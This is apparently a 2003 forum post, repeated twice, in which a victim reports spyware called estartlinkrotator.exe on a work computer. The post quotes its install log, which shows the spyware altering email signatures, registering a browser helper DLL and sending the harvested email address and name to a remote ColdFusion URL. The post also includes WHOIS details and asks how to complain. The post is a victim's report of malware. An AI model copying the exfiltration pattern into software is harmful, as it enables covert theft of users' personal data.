Andonyx
3rd November 2003, 07:39 AM
I came to work today to find my computer unresponsive and sluggish which is somewhat odd for a dual 2.4 xeon workstattion.
After digging through my processes I found something called estartlinkrotator.exe sucking up processing power and harddrive bandwidth.
A search revealed it in my startup menu, in my registry, win.ini..etc etc.
When I finally dug all of it out from safe mode, I went through its install log to find this:
Inside main install function
>>UpdateSignature
UpdateOutlookExpressSignature
the full path is Identities\{EC41636B-709A-4A23-9609-B501EC4E1A65}\Software\Microsoft\Outlook Express\
the key name is 5.0
>>ForceOESignature
<<ForceOESignature
Number of keys = 0
The file path is
C:\Documents and Settings\Administrator\Application Data\Microsoft\Signatures\*.txt
No signature files found
>> ForceOutlookSignature
b4 Setting sig for outlook2002
>>ChangeSignatureInFile
The file name is
C:\Documents and Settings\Administrator\Application Data\Microsoft\Signatures\sig1.txt
...
Inside BHO
The target path is
C:\WINDOWS\System32\BandObjs1,0,0,3.dll
The target path is
BandObjs1,0,0,3.dll
About to register the bandObjs.dll
<<InstallBHO
>>Install_UnInstall
Suucesflly added the UnInstall
In the function UpdateEmailInDB
the default email client is
"%programfiles%\outlook express\msimn.exe" /mailurl:%1
The default email client is Outlook Express
>>GetOEMail
Coudnt open the key for the identities
The path to the key is
Software\Microsoft\Internet Account Manager\Accounts\00000001
<< GetOEMail
The email id retrieved
<edited out>
The display name is
<Edited OUt>
After GetEmailDetails
The cust id is
Anyway, you get the idea....
But then it goes on to post the stolen information to a cold fusion script at the following address....
The url to be posted is
http://www.u-s-go.com/email2db.cfm?email=<edited out>.com&name=<edited out>&id=&program=Test
The customer id is
So going to the u-s-go.com website takes me to some wanna be host called go daddy....
And pullling up a whois yields this:
Registrant:
Go Webhosting
4501-14 Southern Hills Dr. #14
Sioux City, IA 51106-4735
US
530-688-9820
Domain Name: U-S-GO.COM
Administrative Contact:
Master, Host admin@u-s-go.com
4501-14 Southern Hills Dr. #14
Sioux City, IA 51106-4735
US
530-688-9820
Technical Contact:
Master, Host admin@u-s-go.com
4501-14 Southern Hills Dr. #14
Sioux City, IA 51106-4735
US
530-688-9820
Now what can I do with this information to legally complain or have this guy shut down or something.
Granted, although I cannot be 100% sure some idiot at my office didn't somehow install this stuff, I know it's not me...I'm supposed to be the only one who uses this computer, and since it's at work, it didn't come from surfing the seemy underbelly of the net.
After digging through my processes I found something called estartlinkrotator.exe sucking up processing power and harddrive bandwidth.
A search revealed it in my startup menu, in my registry, win.ini..etc etc.
When I finally dug all of it out from safe mode, I went through its install log to find this:
Inside main install function
>>UpdateSignature
UpdateOutlookExpressSignature
the full path is Identities\{EC41636B-709A-4A23-9609-B501EC4E1A65}\Software\Microsoft\Outlook Express\
the key name is 5.0
>>ForceOESignature
<<ForceOESignature
Number of keys = 0
The file path is
C:\Documents and Settings\Administrator\Application Data\Microsoft\Signatures\*.txt
No signature files found
>> ForceOutlookSignature
b4 Setting sig for outlook2002
>>ChangeSignatureInFile
The file name is
C:\Documents and Settings\Administrator\Application Data\Microsoft\Signatures\sig1.txt
...
Inside BHO
The target path is
C:\WINDOWS\System32\BandObjs1,0,0,3.dll
The target path is
BandObjs1,0,0,3.dll
About to register the bandObjs.dll
<<InstallBHO
>>Install_UnInstall
Suucesflly added the UnInstall
In the function UpdateEmailInDB
the default email client is
"%programfiles%\outlook express\msimn.exe" /mailurl:%1
The default email client is Outlook Express
>>GetOEMail
Coudnt open the key for the identities
The path to the key is
Software\Microsoft\Internet Account Manager\Accounts\00000001
<< GetOEMail
The email id retrieved
<edited out>
The display name is
<Edited OUt>
After GetEmailDetails
The cust id is
Anyway, you get the idea....
But then it goes on to post the stolen information to a cold fusion script at the following address....
The url to be posted is
http://www.u-s-go.com/email2db.cfm?email=<edited out>.com&name=<edited out>&id=&program=Test
The customer id is
So going to the u-s-go.com website takes me to some wanna be host called go daddy....
And pullling up a whois yields this:
Registrant:
Go Webhosting
4501-14 Southern Hills Dr. #14
Sioux City, IA 51106-4735
US
530-688-9820
Domain Name: U-S-GO.COM
Administrative Contact:
Master, Host admin@u-s-go.com
4501-14 Southern Hills Dr. #14
Sioux City, IA 51106-4735
US
530-688-9820
Technical Contact:
Master, Host admin@u-s-go.com
4501-14 Southern Hills Dr. #14
Sioux City, IA 51106-4735
US
530-688-9820
Now what can I do with this information to legally complain or have this guy shut down or something.
Granted, although I cannot be 100% sure some idiot at my office didn't somehow install this stuff, I know it's not me...I'm supposed to be the only one who uses this computer, and since it's at work, it didn't come from surfing the seemy underbelly of the net.